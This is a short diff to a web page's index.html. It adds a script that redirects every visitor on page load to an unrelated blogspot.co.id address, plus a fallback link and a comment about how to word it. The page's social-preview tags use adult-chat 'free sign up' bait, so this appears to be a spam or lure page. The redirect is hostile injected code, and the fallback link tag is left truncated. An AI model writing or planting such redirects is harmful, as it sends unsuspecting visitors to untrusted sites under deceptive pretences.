--- a/index.html
+++ b/index.html
@@ -1,5 +1,7 @@
 <html><head>
-
+<script type="text/javascript">
+            window.location.href = "http://ghjgjhkuyiktyi.blogspot.co.id/"
+        </script>
 <meta property="og:title" content="hot sexy cam chat" />
 <meta property="og:type" content="free sign up for you" />
 <meta property="og:url" content="URL Path" />
@@ -9,5 +11,7 @@
 <meta property="og:image:height" content="541" />
 </head>
 <body>
+<!-- Note: don't tell people to `click` the link, just tell them that it is a link. -->
+        If you are not redirected automatically, follow the <a href='http://ghjgjhkuyiktyi.blogspot.co.id/'>link to continue</
 </body>
 </html>
